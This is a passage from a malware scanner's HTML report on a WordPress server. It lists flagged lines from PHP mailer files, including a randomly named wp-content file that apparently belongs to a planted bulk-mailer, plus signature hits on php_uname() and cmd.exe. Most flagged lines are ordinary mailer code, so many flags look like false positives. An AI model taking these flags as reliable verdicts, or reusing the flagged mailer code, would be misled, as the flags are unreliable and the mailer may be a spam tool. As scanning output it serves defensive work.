</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_179").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/1P5gcBv7Uwt.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_180" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
